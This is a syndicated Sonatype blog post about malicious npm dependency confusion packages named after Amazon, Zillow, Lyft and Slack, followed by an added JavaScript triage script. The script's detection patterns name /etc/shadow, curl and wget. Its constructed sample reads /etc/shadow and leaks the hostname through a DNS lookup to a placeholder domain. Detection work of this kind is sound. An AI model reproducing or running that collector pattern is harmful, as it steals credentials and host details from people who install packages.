Newly Identified Dependency Confusion Packages Target Amazon, Zillow, and Slack; Go Beyond Just Bug Bounties

Sonatype has identified new “dependency confusion” packages published to the npm ecosystem that are malicious in nature.

These squatted packages are named after repositories, namespaces or components used by popular companies such as Amazon, Zillow, Lyft, and Slack.

The malicious packages include:

  • amzn
  • zg-rentals
  • lyft-dataset-sdk
  • serverless-slack-app

As previously reported by Sonatype, Alex Birsan’s dependency confusion research disclosure led to copycat researchers publishing 275+ identical packages to the npm repo within 48 hours, in hopes of scoring bug bounties. The number then jumped to over 550 within the next few days.

As of today, Sonatype’s automated malware detection systems, part of Nexus Intelligence, have identified well over 700 npm copycat packages based on Birsan’s proof-of-concept packages.

Although ethical hacking for bug bounties and spreading security awareness has its place and is even welcomed by the community as it keeps us all more secure, the copycat packages recently identified by Sonatype unfortunately cross the line of what is deemed ethical.

What’s inside your /etc/shadow?

Most of the copycat packages spotted by Sonatype that exploited the “dependency or namespace confusion” issue across various open source ecosystems did so by exfiltrating minimal information – just enough to get a proof to present to a bug bounty program.

For example, this would typically involve the researcher making a DNS request from the successfully breached machine to their own server, and collecting information such as the computer’s hostname and IP address.

The new packages discovered by Sonatype, however, go a step further.

First of all, many of these have no disclaimers or code comments in place indicating these are linked to any kind of ethical bug bounty program, or created for security research purposes. While having such a disclaimer in place is no guarantee that a package’s author is working in good faith, (Read more...)
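As an added illustration of the triage check a defender would run on a suspect npm package (example code written for this page, not Sonatype’s detection tooling), the script below scans a manifest’s install-time lifecycle hooks and bundled files for the markers described above: reads of /etc/shadow, hostname collection, and DNS-based callbacks. The package name, manifest, script body and indicator weights are all constructed assumptions.

```javascript
// Install-time hooks are where a dependency confusion package runs on the victim.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators taken from the behaviour described in the post; the weights are an
// assumed triage scheme for this example, not a published scoring standard.
const INDICATORS = [
  { id: "sensitive-file", weight: 5, re: /\/etc\/(shadow|passwd)\b/ },
  { id: "host-identity", weight: 2, re: /\bhostname\b|networkInterfaces/ },
  { id: "dns-callback", weight: 3, re: /\bdns\.(lookup|resolve\w*)\s*\(|\bnslookup\b|\bdig\s/ },
  { id: "remote-post", weight: 2, re: /\bcurl\b|\bwget\b|https?:\/\/\S+/ },
];
// A disclaimer is reported but not scored: the post notes it is no guarantee of good faith.
const DISCLAIMER_RE = /bug bounty|security research|proof[- ]of[- ]concept/i;

// manifest: parsed package.json; files: map of bundled path -> file content.
function triagePackage(manifest, files = {}) {
  const scripts = manifest.scripts || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === "string");
  // Hook commands usually just delegate to a bundled file, so scan both.
  const corpus = [...hooks.map((h) => scripts[h]), ...Object.values(files)].join("\n");
  const matched = INDICATORS.filter((ind) => ind.re.test(corpus));
  const score = matched.reduce((sum, ind) => sum + ind.weight, 0);
  let verdict = "pass"; // no install-time code at all
  if (hooks.length) verdict = score >= 5 ? "block" : "review"; // any hook deserves a look
  return {
    name: manifest.name,
    hooks,
    hits: matched.map((ind) => ind.id),
    score,
    hasDisclaimer: DISCLAIMER_RE.test(corpus),
    verdict,
  };
}

// Constructed sample mirroring the pattern described above (never executed here).
const SAMPLE_MANIFEST = { name: "example-internal-sdk", version: "1.0.0", scripts: { postinstall: "node setup.js" } };
const SAMPLE_FILES = {
  "setup.js": [
    "// constructed sample of an install-time collector",
    "const os = require('os'); const dns = require('dns'); const fs = require('fs');",
    "const data = fs.readFileSync('/etc/shadow', 'utf8');",
    "dns.lookup(`${os.hostname()}.example.invalid`, () => {});",
  ].join("\n"),
};

console.log(JSON.stringify(triagePackage(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```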

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: